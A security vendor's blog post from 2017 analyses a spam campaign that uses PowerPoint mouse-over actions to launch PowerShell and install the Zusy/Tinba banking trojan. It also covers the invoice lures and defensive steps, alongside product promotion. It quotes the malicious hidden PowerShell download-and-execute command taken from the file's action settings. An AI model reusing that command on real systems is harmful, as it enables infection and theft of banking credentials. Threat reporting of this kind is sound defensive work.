Barkly vs Malware
Jonathan Crowe
Jun 2017

"Clickless" PowerPoint Malware Installs When Users Hover Over a Link

A new malware campaign is delivering PowerPoint files with malicious links that can infect victims via mouse over — no clicking or enabling macros necessary.

Attackers have been spotted experimenting with a tricky new method of delivering malware via PowerPoint files. This particular technique exploits the feature in PowerPoint that enables mouse-over actions, abusing it to launch a PowerShell command that triggers the infection process.

It's a relatively novel approach compared to the tried-and-true tactic of abusing macros in malicious Microsoft Word docs that attackers have been using for years. The good news is users are still required to jump through some fairly cumbersome hoops in order to get this attack to work. The even better news is even if it does get launched, Barkly blocks this attack from succeeding before any damage is done.

Let's take a closer look at how this attack works, but first...

Watch the hover-over technique in action and see how Barkly stops the attack:

Wistia video thumbnail - Barkly-vs-mouseover-powerpoint-malware

Thanks for reporting a problem. We'll attach technical data about this session to help us figure out the issue. Which of these best describes the problem?

Any other details or context?


How the attack works (look ma, no macros)

Hiding malware in Microsoft Office files has long been a favorite go-to trick for attackers, but the way they usually go about it is by tricking users into opening a malicious document (most commonly a Word doc) and enabling macros.

Macros are basically commands that can automate tasks and provide additional functionality — so you can understand why attackers might be into leveraging them. Some of the most prolific malware in recent years (Locky ransomware and the Dridex banking trojan are just two examples) has been primarily delivered via malicious macros hidden in Word document email attachments, prompting many security vendors and experts to recommend disabling macros by default

This attack stands apart by not relying on macros. Instead, it leverages the additional command-launching funtionality that PowerPoint's mouse-over actions provide.

Looking at the Action Settings in the malicious PowerPoint file, we can actually see the PowerShell command designed to call out and download the additional malware: 

powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+''+[char] 0x2F+'c.php',\"$env:temp\ii.jse\"); Invoke-Item \"$env:temp\ii.jse\""


When a user opens one of the malicious PowerPoint files they're presented with a single slide with large hyperlinked text that reads, "Loading...Please wait".



By using a mouse-over action, the attackers have booby-trapped the file to automatically trigger a malicious PowerShell command as soon as a user hovers over the link. In other words, a user doesn't even have to click on the link to initiate the infection process. 

What makes this potentially so dangerous is that users are routinely told to hover over links to determine the URL path as a security best practice. Unfortunately, in this case that advice will result in them getting infected. 

The good news is if the user is running an updated version of Microsoft Office, the Protected View security feature should be enabled by default. If it is, a Microsoft PowerPoint Security Notice message should be triggered at this point warning the user of the dangers of allowing an external program to run and offering them the option of disabling it. 

Mouseover-PowerPoint-malware-security-warning.pngIf the user chooses to enable the program, however, the PowerShell command will call out to a server to grab additional components necessary to launch the attack (for more details, see this analysis from researcher Ruben Dodge

This is the point at which having Barkly installed on the endpoint would automatically block the attempted attack in progress.  

Old malware, new trick

The current payload being delivered by this attack has been identified as a variant of the Zusy banking trojan (aka Tinba or Tiny Banker). First discovered back in 2012, Zusy is known for "man-in-the-browser" attacks — adding convincing pop-up forms to legitimate banking websites in order to steal visitor credentials. 


A fake pop-up form injected by the Tinba banking trojan / Avast

How the malware is being distributed

The PowerPoint files are being distributed as attachments in spam emails disguised as invoices or payment confirmations with subject lines like "Purchase Order #XXXXXX" and "Confirmation".

The PowerPoint files themselves are being named variations of "order.ppsx," "invoice.ppsx," or "order&prsn.ppsx."

What to do to protect your company

  • Alert your users. Tell them to avoid downloading invoices in the form of PowerPoint files and to close any PowerPoint files they open with a "Loading...Please Wait" hyperlink immediately. 
  • Make sure Protected View is enabled for Microsoft Office files. That will ensure security alerts pop up anytime an Office document attempts to run an external program.  
  • Deploy runtime malware defense (RMD) that can block attacks like this in real time. This campaign is the latest example of a growing trend of attackers exploiting otherwise legitimate programs and scripting tools to do their dirty work, rather than using malicious executable files that can be detected by AV. That makes deploying endpoint security solutions that can stop attacks during runtime increasingly important. Find out what you should be looking for in an effective runtime malware defense solution. 
Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical perspective.


Never worry about being "Patient Zero"

See how Barkly’s Runtime Malware Defense blocks new attacks other solutions miss, no updates required.

See a demo


Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.